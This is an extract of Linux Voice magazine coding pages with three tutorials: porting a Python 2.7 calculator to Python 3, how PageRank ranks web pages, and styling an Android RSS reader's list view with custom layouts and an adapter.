                              However, there were also advantages to breaking            real improvements:
                            compatibility with Python 2. It has enabled the                 Unicode is supported throughout the standard
                            developers to get rid of a lot of the cruft that had built      library and is the default type for any strings
                            up in the language, and helped them to add some                 defined.
                            modern features. Mistakes in the core API can be                The new asyncio library, which is part of the
                            corrected without having to worry about maintaining             standard library, gives a defined way to do
                            compatible with a whole host of older software.                 asynchronous programming in Python. This makes
                                                                                            it easy to write concurrent programs enabling you
                            The language evolves                                            to make the most of your new-generation hardware.
                            It’s important to understand how Python is developed            Better exception handling: in Python 2.X there were
                            and designed by its community. Thanks to the very               lots of ways to throw and catch exceptions; with
                            open design discussions through Python                          Python 3, error handling is cleaner and improved.
                            Enhancement Proposals (see the What In The World                Virtualenv is now part of the standard Python
                            Are PEPs boxout, right), there are reasoned                     distribution. The Virtualenv environment provides
                            discussions around every change in the language.
                            Decisions are made on these discussions by the
                            Python community at large and of course by the                 What in the world are PEPs?
                            Benevolent Dictator for Life (BDFL) Guido Van                  PEPs (Python Enhancement Proposals) are the main
                            Rossum, the original creator of the Python                     forums in the Python community for proposing new
                            programming language. Along with this form of                  features or improvements to the Python core language.
                            discussion, there are also a lot of language decisions         They enable the community to review, discuss and improve
                                                                                           proposals. They also enable readers to digest why certain
                            made on the Python development mailing list.
                                                                                           features are the way they are as well as looking at the
                                Most of the decision making and design proposals           alternates were rejected and why, so they’re often helpful
                            for the Python 3 took place during PEPs 3000                   in understanding how you would use a certain feature – a
                            and 3100, which are still online for all to see. It is         good example being PEP-8, (http://python.org/dev/peps/
                            through this open forum that the Python language               pep-0008), which documents the suggested coding style
                                                                                           for Python. Popular tools such as pep8 and flake8 enforce
                            is developed and is truly one of the great parts of the
                                                                                           these rules when run on a Python file. The main PEP index
                            language and its ecosystem. What makes Python                  can be found at http://python.org/dev/peps.
                            3 worth the switch? Why should your new project



100                                                          www.linuxvoice.com
                                                                                                                                PYTHON 3 CODING

  a way to build a lightweight Python runtime that          }
  enables you to have isolated Python environments          CHINESE_MESSAGES = {
  running potentially different Python versions and           “greeting”: u”世界,你好!”,
  libraries. Previously this was third-party software         “num1”: u”第一个号码”.encode(“utf-8”),
  which had to be installed separately. If Python 3 is        “num2”: u”第二个号码”.encode(“utf-8”),
  installed on your system, then so is Virtualenv.
  PYC (Python Byte Compiled) files now live in a                “div”: u”除以%d%d给出了%f”.encode(“utf-8”)
  new directory called pycache. In previous Python          }
  releases, PYC files cluttered directories as they lived
  in the same place as the source files. There is also      LOCALES = {
  an improvement in how they are stored, as there are         “en”: ENGLISH_MESSAGES,
  separate files per interpreter.                             “ch”: CHINESE_MESSAGES
  There is now a single number type in Python. Prior        }
  to Python 3, there were two types: longs and int,
  which has been simplified to just the int type.           def grab_input(locale_messages, locale_key):
  The standard library itself is much improved in lots        user_msg = locale_messages[locale_key]
  of places.                                                  x = raw_input(user_msg)
  The main thing to note is that the effect of the            # python 2.X converts this automatically to a long
changes in Python 3 on the syntax and overall                 # in the case where it is > sys.maxint
usability of the language is very small. This should          # something you don’t have to think about with
mean that existing Python developers feel very                # python 3
comfortable with Python 3 and that Python 3 is just           return int(x)
as user friendly as other Python versions are to new
users of the language.                                      def div(x, y, locale_messages):
  At the time of writing, mainstreams distributions do         # need to first make x a float before we can divide
not ship Python 3 as the default distribution. However,        floated_x = float(x)
some systems come with Python 3 installed, while               print locale_messages[“div”] % (
others have it in the repositories. Ubuntu comes                  x, y, (floated_x / y))
with Python 3 pre-installed in 14.04. In 12.04, you            return floated_x / y
can install Python 3 by getting the python3-minimal         if __name__ == “__main__”:
package from your package manager. Ubuntu and                  parser = argparse.ArgumentParser()
Fedora have open tickets to make Python 3 the                  parser.add_argument(“--locale”, “-l”, dest=”locale”,
default Python. This is currently scheduled for Fedora      default=”en”)
22, and was an unreached goal for Ubuntu 14.04.                args = parser.parse_args()
More information on installing Python 3 on Ubuntu              locale_messages = LOCALES[args.locale]
can be found in the boxout below.                              print locale_messages[“greeting”]
                                                               x = grab_input(locale_messages, “num1”)
Porting to Python 3                                            y = grab_input(locale_messages, “num2”)
Let’s take a look at what’s involved in porting some
code from Python 2.7 to 3.3. This example will explore          div(x, y, locale_messages)
some of the main pain points and improvements in               This program asks a user for two numbers, and
Python 3.3 – the code is quite simple, but in the wild      then displays the result of addition, subtraction and
there are a lot of different challenges that you could      division of these numbers. The main difficulty in
face when trying to port large bodies of code. All of the   this program is the Unicode support for the Chinese
code listings, for Python 2.7 and Python 3 versions,        locale. The following is a demo run of the program
can be found at linuxvoice.com/lv5-python.tar.gz.           using the Chinese locale.
  The code we’re using is a simple locale-specific          $ python2.7 simple_calc.py --locale=ch
calculator program. This program displays some of           世界,你好!
the inherent problems with the way that Python 2.X
manages Unicode. Below is a full code listing of the
                                                                Installing Python 3 from PPA
code written for Python 2.7 :
#!/usr/bin/python2.7                                            If you’re using an older version of Ubuntu, the version
# -*- coding: utf-8 -*-                                         of Python 3 installed may be as old as Python 3.2 (in
                                                                the case of Ubuntu 12.04). Luckily, there is a PPA called
import argparse
                                                                “deadsnakes” maintained by Felix Krull. At time of writing,
                                                                this supported the following Python revisions: 2.3, 2.4, 2.5,
ENGLISH_MESSAGES = {                                            2.6, 2.7, 3.1, 3.2, 3.3, 3.4. The PPA can be added by adding
  “greeting”: “Hello world”,                                    the line ppa:fkrull/deadsnakes to your software sources.
  “num1”: “First Number:”,                                      After the PPA is configured on your system you can install
                                                                Python 3.3, for example, with:
  “num2”: “Second Number:”,
                                                                sudo apt-get install python3.3
  “div”: “Dividing %d by %d gives %f”



                                                                www.linuxvoice.com                                                                101
      CODING PYTHON 3

                  第一个号码27                                                             result in a float value. The previous default behaviour
                  第二个号码4                                                              is preserved in Python 3.3 under the // operator.
                  加入 27 ~ 4 给了我 31                                                       As mentioned before, porting a big body of code
                  减去27至4给了我23                                                         is very different to our example and there are a few
                  除以274给出了6.750000                                                    things that we have to make sure of before attempting
                    Let’s dig a little deeper into the portions of the code           any port to Python 3.
                  that deal with Unicode.                                                The project is thoroughly unit-tested. Regressions
                  # -*- coding: utf-8 -*-                                                and bugs in the porting process can easily go
                  This line tells the Python interpreter which encoding                  unnoticed without a full suite of tests.
                  it should use to read the Python file. Without this                    The project is using Python 2.7. Using the latest
                  comment, Python defaults to reading the file using                     version of the Python 2.X interpreter allows the
                  the ASCII encoding. This encoding enables us to                        developer to benefit from some features that
                  read Unicode literals in the source code such as                       are backported from Python 3 and is the easiest
                  the Chinese messages in the greetings dictionary.                      migration path.
                  Omitting this from our source code will result in the                  To make porting code to Python 3 as easy as
                  following exception when running the code.                          possible, there’s a tool called 2to3, which should be
                  SyntaxError: Non-ASCII character ‘\xe4’ in file simple_calc.py on   on the system path if Python 3 is installed on your
                  line 14, but no encoding declared; see http://www.python.org/       system. 2to3 is a utility script, which takes Python
                  peps/pep-0263.html for details                                      2.7 file(s) as input and outputs the equivalent code
                    The next thing to understand in the source is how                 compatible with the Python 3 interpreter.
                  the Chinese characters are declared.                                   First, before making any modifications, the 2to3
                  “num1”: u”第一个号码”.encode(“utf-8”),                                   tool enables you to output a diff of what modifications
                  The unicode literal is encoded using the “utf-8”                    will be done:
                  encoding. This converts from a Unicode type to a                    2to3 simple_calc.py
                  str type in Python, which is what Python 2.7 uses                     For the sake of this tutorial, we want to preserve
                  by default. If we don’t encode the Unicode literal, the             the Python 2.7 version of the code and create a new
                  Python raw_input function will not be able to output                version of the file in a directory called python3. Here’s
                  a Unicode literal and execution will fail as in the                 the command to output a Python 3 version of the
                  following example:                                                  code into the python3 directory (presuming that the
                  >>> unicode_value = u”世界,你好!”                                       Python 2.7 version of the file is housed under the
                  >>> raw_input(unicode_value)                                        python27 directory):
                  UnicodeEncodeError: ‘ascii’ codec can’t encode characters in        2to3 -o python3 -nw python27/simple_calc.py
                  position 0-5: ordinal not in range(128)                             The -o argument specifies the directory to write to
                     This is one of the problems in Python 2.7: the                   and the -nw tells the tool there’s no need to write
                  default string encoding is ASCII, meaning that any                  any backups (it’s worth a look at the man page for
                  non-ASCII encoded strings must be encoded to work                   a comprehensive guide to the options in 2to3). This
                  in some core functions like raw_input.                              command will output a file called simple_calc.py in
                                                                                      the python3 directory.
                  Integer division                                                      Let’s look at the changes that the 2to3 code made
                  Another Python 2.7-specific functionality that has                  and what changes are needed to make it work to our
                  been replaced in Python 3.3 is integer division. This               expectations.
                  behaviour is summed up in the two examples below:                     The first major change that happens is one of
                  one is code running in a Python 2.7 interpreter, while              the most controversial and best-known features
                  the other is running in a Python 3 interpreter.                     of Python 3. Printing output in Python 2.7 was
                    Python 2.7:                                                       done using a statement rather than a function, ie
                  >>> x, y = 21, 5                                                    no parenthesis. In Python 3 this was replaced by a
                  >>> x / y                                                           function. This backwards-incompatible change is
                  4                                                                   one of the far-reaching changes, and makes running
                  >>> float(x) / y                                                    Python 2.X code in a Python 3 interpreter often
                  4.2                                                                 impossible without using a tool like 2to3. Below is an
                  >>> x / float(y)                                                    example of the change made by 2to3.
                  4.2                                                                   Python 2.7:
                    Python 3.3:                                                       print locale_messages[“greeting”]
                  >>> x, y = 21, 5                                                      Python 3.3:
                  >>> x / y                                                           print(locale_messages[“greeting”])
                  4.2                                                                    There are a number of reasons to have print as
                  4                                                                   a function. A function enables you to more easily
                     As should be clear from the examples, in Python 2.7              override and add functionality to print without having
                  division of two integers always resulted in an integer.             to change Python syntax. It also makes it easier to
                  In Python 3.3, division of two integers will always                 mock out in unit tests. The next thing of note is that



102                                                    www.linuxvoice.com
                                                                                                                                PYTHON 3 CODING

2to3 replaced the raw_input function for retrieving
user input with the simpler function name of input.
Here’s the Python 2.7 code:
x = raw_input(user_msg)
… and here’s the equivalent in Python 3.3:
x = input(user_msg)
   Finally, in Python 3, string literals’ default type
is Unicode. This means that we no longer have to
include the u before the string literal to indicate
that it is a unicode string. This preceding u was
actually removed as part of Python 3, but to help
with migration to Python 3, was re-included (as
documented in PEP 414). Unicode is everywhere in
Python 3 by default. The 2to3 tool has stripped the
Chinese strings of the preceding u.
   Running the generated code using Python 3
produces output similar to the following:
$ python3 python3/simple_calc.py --locale=ch
                                                                                                                                      Python Wall of
世界,你好!                                                                 The program failed with a Type Error exception.
                                                                                                                                      Superpowers is a
b’\xe7\xac\xac\xe4\xb8\x80\xe4\xb8\xaa\xe5\x8f\xb7\xe7\             This is due to the fact that string formatting using the          colourful way to check
xa0\x81’456                                                         % symbol in Python 3 does not work on bytes strings.              for Python 3 support in
b’\xe7\xac\xac\xe4\xba\x8c\xe4\xb8\xaa\xe5\x8f\xb7\xe7\             In order to use this string formatting, the messages              external libraries.
xa0\x81’32                                                          must be Unicode strings. The fix employed in the last
Traceback (most recent call last):                                  step will also fix this, as the strings being operated
 File “python3/simple_calc.py”, line 68, in <module>                on will now be of the Unicode type. Bytestrings will
   add(x, y, locale_messages)                                       support % symbol formatting soon, and details of this
 File “python3/simple_calc.py”, line 42, in add                     change can be found in PEP 461.
   x, y, (x + y)))                                                     In the last step of this conversion, Python 3’s new
TypeError: unsupported operand type(s) for %: ‘bytes’ and ‘tuple’   division operator, can save a few lines of code. For the
                                                                    division function, we were previously casting ints to
There is no magic wand!                                             floats in order to get floating number results from the
This example demonstrates the fact that although in                 division. In Python 3, this is the default behaviour of
most cases the 2to3 utility can make Python 2.7 code                division for two int values, meaning there is no need
runnable, it doesn’t necessarily fix any logical issues             to cast to a float before that point. The modified div
or discrepancies that result from the porting exercise.             function is shown below:
The converted program has a number of runtime                       def div(x, y, locale_messages):
errors that are both visible and cause program                        print(locale_messages[“div”] % (
execution to fail. These cases highlight the necessity                   x, y, (x / y)))
of having a full suite of unit tests before attempting to             return x / y
port code.                                                            Porting even this very simple application took
   The main problem exhibited while running the                     some effort after use of the automatic tool to make it
code under Python 3 is that we were previously                      work as expected. Larger bodies of code will result in
converting the Unicode Chinese characters to str                    significantly more work.
types. This meant that when we convert it, the str                    There is huge momentum currently in the Python
type becomes the bytes type, which is rendered in                   community around improving the library support for
its full representation (including the b). As Unicode is            Python 3, and there are many resources to give you
now the default string type in Python, there is no need             an indication of what libraries are supported by
to first encode it to “utf-8”. The Python 3 interpreter             Python 3. The Python 3 Wall of Superpowers website
example below demonstrates this:                                    (http://python3wos.appspot.com) shows an up-
>>> x = u”第一个号码”                                                    to-date listing of the compatibility of major Python
>>> print(x)                                                        Package Index libraries with Python 3. If your project
第一个号码                                                               uses a lot of external libraries, this is a great way to
>>> print(x.encode(“utf-8”))                                        evaluate if porting your code is possible. If you have
b’\xe7\xac\xac\xe4\xb8\x80\xe4\xb8\xaa\xe5\x8f\xb7\xe7\             the expertise, and a library you depend on doesn’t
xa0\x81’                                                            support Python 3, why not take it on as a personal
   To fix this, remove the encodings in the CHINESE_                challenge and submit a pull request for that project?
MESSAGES dictionary declaration. The input function
in Python 3 accepts Unicode strings as the input                     Richy Delaney is a software engineer with Demonware
string, whereas the raw_input for Python 2 expects                   Ireland, working on back-end web services using Python and
                                                                     Linux. He has been an avid Linux user for the past five years.
strings only.



                                                                      www.linuxvoice.com                                                                        103
       CODING NINJA



                                  CODE NINJA:
           TUTORIAL
                                  RANKING WEB PAGES
                                  There’s a lot of rubbish on the web, so how to you sort the good
   BEN EVERARD
                                  from the bad – and make billions of dollars doing so?


                                  C
                                          reating a web search engine that returns useful   the web to vote on what they think are the best sites
 WHY DO THIS?                             information isn’t easy. Not only do you have to   using their links.
 • Write your own search                  index every page, but you also have to find to
   engine and invade
   others’ privacy for profit.    decide which of the millions of pages that contain the    Beat Google at its own game
 • Unlock the secrets of          particular search words are most interesting.             To start with, you need a list of all the pages on the
   a multi-billion dollar         Originally, some of the better search engines did this    web and details of what they link to. Once you have
   corporation.                   by manually curating lists of the most important sites,   this, you can then add up the links and see what page
 • Get a job in sunny             but this approach simply couldn’t keep up with the        has the most pages linked to it. A simple assessment
   California.
                                  growth of the web.                                        would say that this is the most important page.
                                     In the mid 90s, Larry Page and Sergey Brin looked      However, that simple assessment could be wrong. It
                                  to the way web pages linked to each other to provide      would be easy to game this system by creating a lot
                                  an answer. They reasoned that the structure of these      of links to a page; also, the algorithm would give a
                                  links could be used to determine how important a          fairer picture of the situation if links from important
                                  particular page was, because the more important           pages were given a higher importance from links from
                                  pages would be linked to more pages than other, less      pages that are less prominent.
                                  important pages. The idea came from academia,                Initially, this might seem to create a catch-22
                                  where the importance of a published paper is often        situation: the importance of the page is determined by
                                  determined by the number of papers that cite it.          the algorithm, but the algorithm needs to know the
                                     The method, which they called PageRank,                importance of the pages to run.
                                  democratises the problem of deciding the value of a          Another way to frame the same issue is to say,
                                  particular web page by allowing every other page on       what’s the probability that someone who clicks on




                                             a                                                                                      b



                                             c
Calculating the PageRanks
for a mini-web of just four
pages. This particular
                                                                                                                                    d
arrangement took quite a
long time to stabilise.


  Page ranks
            t=0          t=1                t=2                 t=3                t=4      ...       t=29                t=30
  a         0.25         0.14375            0.0534375           0.0534375          0.0534375          0.0534375           0.0534375
  b         0.25         0.56875            0.388125            0.54165625         0.4111546875 0.4721460486 0.4702383587
  c         0.25         0.0375             0.0375              0.0375             0.0375             0.0375              0.0375
  d         0.25         0.25               0.5209375           0.36740625         0.4979078125 0.4369164514 0.4388241413
      Table showing the PageRank values for each page at each iteration.



104                                                               www.linuxvoice.com
                                                                                                                                         NINJA CODING


  Open source search engine
  If you’ve read this article, then you’ve probably guessed that
  creating a useful web search engine takes a phenomenal
  amount of computing power. This makes it unfeasible for
  most people to simply install the software on their
  computer and start running their own search engine.
      The YaCy project is hoping to change this. Rather than
  rely on a centralised data centre controlled by a single
  company, it’s powered by users around the world in a
  peer-to-peer network that share the load of indexing and
  searching. The advantage of this is that there’s no central
  point that could be used to censor it, and it allows the web’s
  users to take back control of how search works.
      Currently the search engine is functional, but the results
  can leave a little to be desired. However, if more people join,
  then the results should improve. To join, you just have to
  download the tarball from www.yacy.net, and run the
  startYACT.sh file. This will start the back end running, and
  start a web browser on localhost:8090 that has a search
  engine interface.                                                 You can instruct YaCy to index particular pages. Here it’s crawling LinuxVoice.com



links at random will end up at a particular web page?               from the previous step. At time 1, the value of the
This is known as a random surfer. In a sense, this                  page rank for any one page is calculated by going
question is the same as the previous question. The                  through each page that links to it, and summing the
more links to your page (and the more important the                 value of that page’s page rank divided by the number
pages that link to it are) the more likely that the                 of links on the page. This divides the page’s
random surfer will get to your page.                                importance to all the pages it links to.
   If the surfer gets to a page with no outlinks, it just           PR(p, t) = (1-d)/N + d*((PR(pl1, t-1)/L(pl1) + PR(pl2, t-1)/L(pl2)
restarts at a random site. To avoid getting stuck in                + … + PR(pln, t-1)/L(pln))
loops (and to help the algorithm run better), they also                Where PR(p,t) is the PageRank of page p at time t,
added a damping factor. This is the probability that the            d is the damping factor, N is the number of pages in
random surfer clicks on a link rather than starting                 the network, L(p) is the number of links on page p, and
afresh at a new URL. You could create a program that                pl1 … pln are the pages that link to page p.
performs this random surf; it sets off from any one                    This is a bit clearer if it’s put in pseudo code (which
page and clicks around randomly and traces the path                 calculates the values for t=1 to t=limit):
of the pages it traverses. However, with billions of                for time in 1 ... limit:
pages on the web, it would take quite a long time to                 for page in all_pages:
complete – so much so that by the time it’s                           page.page_rank(time) = 0
completed, it would be so out of date as to be useless.               for from_page in pages_that_link_to(page):
   What’s more, there’s a problem. If the random surfer                 page.page_rank += from_page.page_rank(time-1) /
gets to a page where there are no outlinks, it’s easy               number_of_links_on(from_page)
enough for it to just exit and start again at a random                page.page_rank = (1 – damping_factor) / number_of_pages +
page. However, what if it gets stuck in a loop of pages             (page.page_rank * damping_factor)
that just link back to each other?                                      Brin and Page went on to create Google and used
                                                                    this algorithm as the basis for their search engine.
The damping factor                                                  Those six lines of simple code define the algorithm
The damping factor is PageRank’s solution to this: it’s             that made one of the largest companies in the world.
the probability that the random surfer will click on a              It allowed them to return more accurate results than
link on the page (the alternative is that they just enter           any other search engine at the time, and therefore
a new URL at random and surf from there), and it’s the              gain an upper hand in the search market. This they
only thing about PageRank that you can tweak.                       used to gain an upper hand in the advertising market,
Initially, Brin and Page suggested using 0.85, and                  and well, you know the rest. If ever an algorithm can
most people find that this is about right.                          be said to have changed the course of history, this is
   We can calculate the damping factor across all the               it. Without it, we’d all be using iPhones instead of
pages simultaneously by iterating towards a solution.               Android phones and saying ‘Binging’ to mean
Initially, we say that the random surfer has an equal               searching the web.
chance of being on any page. Therefore, at time 0, the                  Google’s search has moved on, and it now takes
page rank for any page is 1 / the number of pages.                  into account over 200 signals. It’s a little cagey about
   We then move through the time steps, and each                    exactly what these 200 signals are, but it’s thought
time, we calculate the PageRank based on the values                 that one of them is still page rank.



                                                                      www.linuxvoice.com                                                                 105
         CODING ANDROID



                                  ANDROID DEVELOPMENT
 CODING TUTORIAL
                                  PART 2
                                  We’re prettying up last month’s simple RSS reader to add more
GRAHAM MORRISON
                                  information and we get the whole thing running on real hardware.

    WHY DO THIS?                    1    KEEPING UP APPEARANCES
    • Android development
      needed be that difficult,
      and millions of users       Last month’s application was functional but basic. It
      can take advantage of       used a default ListView widget to display the titles of
      your work.                  news stories posted onto our website and enabled the
    • Help develop the Linux      user to touch a story to open it in a browser. Changing
      Voice Android
      application.                the default appearance of the ListView in Android, and
    • Develop awesome skills      nearly every other GUI element, is accomplished
      and career prospects.       through the XML files that are used to represent each
                                  layout. For our main activity, this is the activity_main.
                                  xml file found in the res sub folder. Open this and add
                                  the following inside the ListView element for our
                                  application:
                                  android:dividerHeight=”2dp”
                                  android:divider=”#c61a27”
                                     What we’ve done here is add a gap between the
                                  elements in the ListView and coloured that gap with
                                  an HTML colour notation value of c61a27. This just
                                  happens to be the red of Linux Voice, and Android
                                  Studio will even display a preview of this colour in the
                                  border to the left of your code. It appears as a small
                                  square, and if you click on this you’ll be able to select a
                                  different colour from the palette dialog. But what does
                                  dp represent? This is dimension notation for Android
                                  and it’s Google’s solution to never knowing the
                                  resolution or pixel density of the devices you’re
                                  working with, and working with increasingly large and
                                  abstract resolutions. It won’t be long until we’re
                                  dealing with 4k displays, for instance. dp is an
                                  abbreviation for ‘density-independent pixels’. The            After this tutorial, your app should look like this, with long
                                  principle is that you take 160dpi (pixels per inch) as a      story descriptions, bold titles and an icon for each story.
                                  baseline value, where 1dp = 1 pixel at 160dpi, but that
                                  the value is scaled automatically according to the size       adapt to different screen resolutions, but px can be
                                  and resolution of the display. If your display has a          useful when dealing with the fixed layouts of bitmaps.
                                  density of 320dpi, for example, there would be two            sp is another dimension format, similar to dp, but the
                                  pixels for every 1dp.                                         number of pixels it represents changes when a user
                                     dp is the most common layout dimension, but it’s           changes the font size. You can often see these
                                  also possible to use px for absolute pixel control. This      changes directly in the design preview window within
                                  isn’t recommended – your layouts won’t be able to             Android Studio, which is the best way to get a good
                                                                                                idea about how your application is going to look.
                                                                                                   Appearance is augmented further through XML files
                                                                                                and classes that are linked from the activity_main.
                                                                                                xml file. For example, you can colour items pressed
   Colours and images are
                                                                                                and unpressed in your list purely from XML. If you add
   previewed in the tiny
   border to the left of your                                                                   the following line, Android will look for a resource file
   code. Click on a colour to                                                                   called selected that it can use to illustrate selected
   open the colour palette                                                                      items in the list view:
   requester.                                                                                   android:listSelector=”@drawable/selected”



   106                                                             www.linuxvoice.com
                                                                                                                    ANDROID CODING


  2    GRADIENTS
To create the resource file we just linked to, right-click                                                                Gradients are a good way of
on the drawable-hdpi folder in your project hierarchy                                                                     subtly showing the
and select New > Drawable Resource. Give this the                                                                         difference between one cell
name selected and make sure the root element type                                                                         and the next, or when an
is selector. This will create the new file and solve the                                                                  item is selected.
dependency error in activity_main.xml. There are
three states we can define here – one where an item
is selected, one where an item is selected and still
pressed and one where an item is pressed but not
selected. The shading for each of these states should
also be farmed out to separate files so that any other
lists or items can have the same appearance, and to
define how each item is handled, you will need the
following code inserted between the selector start           want to be able to add the title of a story, its brief
and end elements:                                            description and an icon. To do this, we’ll need to create
<item                                                        a separate layout for this cell and tell the ListView how
 android:state_selected=”false”                              to use our own layout rather than the one it defaults
 android:state_pressed=”false”                               to. We’ll start by creating a new layout for an individual
 android:drawable=”@drawable/gradient1” />                   item. Right-click on Layout on the folder view and
<item android:state_pressed=”true”                           select Layout Resource File from the drop-down
 android:drawable=”@drawable/gradient2” />                   menu that appears. Change the root element from
<item android:state_selected=”true”                          LinearLayout to RelativeLayout and provide a filename
 android:state_pressed=”false”                               – we called ours singlerow.xml. Android Studio will
 android:drawable=”@drawable/gradient2” />                   now switch to the visual editor layout mode for the
   This code is simple enough to understand, and             new file.
you’ll need to create two further drawable resource             Android Studio can be very helpful when it comes to
files to satisfy each of the states. Their root elements     layouts and will inform you of any required elements
will be shape rather than selector, as shape drawable        that may be missing. This is important when creating
elements can be used to define backgrounds, borders          a new user interface, because the way your
and gradients, which is how we’re going to use them.         application looks and behaves is dependent on how
We’ve called these files gradient1 and gradient2. As         you ‘hang’ the layout within the scaling designer. To
you can tell from their names, we simply use these to        get started, drag an ImageView widget from the Tools             PRO TIP
define different colour gradients for each of the            palette and into your application. As you hold the left       Android Studio can
                                                                                                                           handle more than one
selection states. We won’t go through each of the            button down and drag the destination cursor around            project at a time, and can
three, but here’s how our first gradient looks:              the virtual Android device, you’ll see Android Studio         use either the existing
android:shape=”rectangle”>                                   highlight all kinds of alignment possibilities. But           application window or
                                                                                                                           open a new environment.
<gradient                                                    because there’s no image attached to the ImageView            Choose your preference
 android:startColor=”#f1f1f2”                                widget, you won’t be able to see any of the alignment         when you open a project
 android:centerColor=”#e7e7e8”                               effects. To solve this problem, click on the ImageView        while another project is
                                                                                                                           already open.
 android:endColor=”#ffadadad”                                widget in the component tree (this lists all the various
 android:angle=”270” />                                      UI components in your layout), then select the src
   This works in exactly the same way the gradient           data cell in the Properties list below. You should see a
tool does in Gimp, and after you’ve added the HTML           … (ellipsis) icon used to denote a file requester.
colour entries you’ll be able to click on the small          Clicking on this will open a window that lists all the
coloured square in the code border to change the             resources currently available to your project.
colour to something else. You should also see a              Resources include colours, UI design components
preview of the gradient to the right of the code so you      and external images. But there’s no way from here to
can make sure it’s the effect you think it is. Create the    add your own images, and to do that, we’ll need to go
gradients in the same way, making the colours slightly       back to Android Studio.
different. This gradient is going to be used when you
select an element within the list.                           Adding image assets
                                                             The various folders beneath res are for different
New items                                                    resolutions -hdpi, mdpi, and ldpi, as well as designs
We’re now going to take on a bigger job, and that’s          and menus. Right-click on res, select New and then
redefining the appearance of the ListView itself. At the     select Image Asset. This opens Asset Studio, which is
moment, there’s very little we can change about the          a tool to make importing and managing images
contents of a single item other than the text, but we        easier. Make sure the asset type is set to Launcher



                                                               www.linuxvoice.com                                                                  107
      CODING ANDROID

                                 Icons and use the … file requester to the right of the        being drawn on top of each other, make sure the
                                 image file location to point at an image location. There      ImageView is first and contains the following:
                                 are several different kinds of icons in Android.              android:layout_alignParentTop=”true”
                                 Launcher is the icon you’ll see on your device’s launch       android:layout_alignParentLeft=”true”
                                 or home screens. Action Bar icons are found in                android:layout_alignParentStart=”true”/>
                                 Android’s equivalent to a toolbar at the top of the             For the first text view, which is going to hold the title
                                 screen, and notification icons are used within the            of our story, add this to its main element. The
                                 notification view.                                            ImageView being referenced here is the default id/
                                    We used a download of our ‘LV’ logo, as this will also     name for the ImageView widget we created, so this
                                 be ideal as the launcher icon. When selected, you’ll          should be the same:
                                 see previews of your resized image for each resolution        android:layout_alignTop=”@+id/imageView”
                                 and you shouldn’t need to change any of the other             android:layout_toRightOf=”@+id/imageView”
                                 settings. Clicking on ‘Next’ will show you where each           And for the final TextView widget, you’ll need to
                                 resolution of the image is going to be placed within          change the above two lines to the following, which
                                 your project’s res folder structure, and clicking on          places the TextView that will hold the description
                                 Finish will apply those changes. You will immediately         below the TextView that’s going to hold the title:
                                 be able to see your image as a resource within the            android:layout_toRightOf=”@+id/imageView”
                                 resolution folders of the project view, and when you go       android:layout_below=”@id/textView”
                                 back to the Resources requester in the designer, you’ll          The layout and alignment works in a similar way to
                                 see your images listed as a resource – usually near           object arrangement in an application like Inkscape or
                                 the bottom of the list. Select it and click on OK.            Scribus. You can play around with the various options
                                    Designing the layout using this view reminds us of         either by letting Android Studio auto-complete the
                                 the early days of QtDesigner, as you can’t always tell        layout_ keywords, or by dragging widgets around
                                 what element of the user interface is having the effect       within the visual editor. We’d also suggest changing
                                 you can see. Both the Relative and Linear layouts             the font size for the title TextView and perhaps
                                 work like this – relative lets you link the position of one   adjusting the colour of the description text, but these
      PRO TIP
                                 widget to the location of another, while linear places        can be changed at any time.
 If you’re not using version
                                 widgets next to each other, either horizontally or
 control, you can zip up an
 entire project folder to take   vertically. We’ve found that it’s easier to add widgets
 a snapshot and even move        and make adjustments in the visual editor, while
 this to another Android
                                 layout is easier to define in the text editor. With that in
 Studio installation. Any
 new SDK is picked up            mind, add two Plain TextView widgets without
 automatically.                  worrying where they fall in the layout, and switch back
                                 to the Text editor. First, make sure that the
                                 RelativeLayout, the ImageView and the two TextViews
                                 all contain the following:
                                 android:layout_width=”wrap_content”
                                 android:layout_height=”wrap_content”
                                   wrap_content will enable a widget to only expand
                                 enough to contain whatever values it contains, rather
                                 than fill_parent, which allows the widget to take up as       Android Studio will automatically scale an image for each
                                 much space as is available. To stop all our widgets           different class of resolution.

                                    3    THE CODE
                                 Now we’ve got the GUI design sorted, it’s time to add             this.title = title;
                                 the functionality to the code, and this is pretty simple.         this.description = description; }
                                 Most of this is handled by a new class that needs to
                                 be created (right-click on the Java folder) and called           @Override
                                 lvList. Here’s what it needs to contain:                         public View getView(int position, View view, ViewGroup
                                 public class lvList extends ArrayAdapter<String>{             parent) {
                                   private final Activity context;                                  LayoutInflater inflater = context.getLayoutInflater();
                                   private final String[] title;                                    View rowView= inflater.inflate(R.layout.singlerow, null,
                                   private final String[] description;                         true);
                                   private ImageView imageView;                                     TextView txtTitle = (TextView) rowView.findViewById(R.
                                   public lvList(Activity context, String[] title, String[]    id.textView);
                                 description) {                                                     TextView txtDescription = (TextView) rowView.
                                     super(context, R.layout.singlerow, title);                findViewById(R.id.textView2);
                                     this.context = context;                                        txtTitle.setText(title[position]);



108                                                                      www.linuxvoice.com
                                                                                                                                      ANDROID CODING

     txtDescription.setText(Html.fromHtml(description[positi
on]), TextView.BufferType.SPANNABLE);
     return rowView;
  }}
   As with last month, add the import lines when
Android Studio complains about missing modules.
This code is creating an adapter to replace the
standard adapter used to load ListView items. That’s
why there’s an @Override statement, and within the
method that follows, we place the title and description
passed to the class when initialised to the widgets we
created in the designer. Our single ListView item is
expanded to a view, and we convert the HTML of our
RSS feed using setText(Html.fromHtml(description
[position]) method. By default, this is the entire
contents of a post, but you can change this by
replacing getElementsByTagName(“content:encod
ed”) with getElementsByTagName(“description”)’ in
our parseRSS class, as they’re referring to different
elements within the RSS.
   The final chunk of code modifies the MainActivity
replacing the old use of an adapter with our new one.
To do this, comment out the line starting with                        within the storylist ListView used by MainActivity.         The code to pull all the GUI
                                                                                                                                  elements together is
storylist.setAdapter in the populate_list() method,                   After all this has been set and defined, all that’s left to
                                                                                                                                  probably simpler than the
and add the following two lines:                                      do is run your new application. The latest stories will
                                                                                                                                  XML.
lvList adapter = new lvList (MainActivity.this, dataRSS.              download, complete with either the entire text or the
postTitle, dataRSS.postContent);                                      overview, and tapping any story will still open the page
storylist.setAdapter(adapter);                                        in the browser.
All we’re doing here is creating a new adaptor using
the lvList class we just created, passing the RSS                       Graham Morrison is the author of Kalbum, a photo collection
values from the function we wrote last month. Those                     manager that, in its heyday, was in the Mandriva repositories.
                                                                        Nowaday’s he’s best known as Linux Voice’s Editor In Chief.
values will be used to populate the list and we use this


  Run your app on your phone You’re not a real developer until you can touch your own code.
  The emulator that’s bundled with Android Studio is        AndroidManifest.xml file, placing it beneath            Android device, and you can get this value by typing
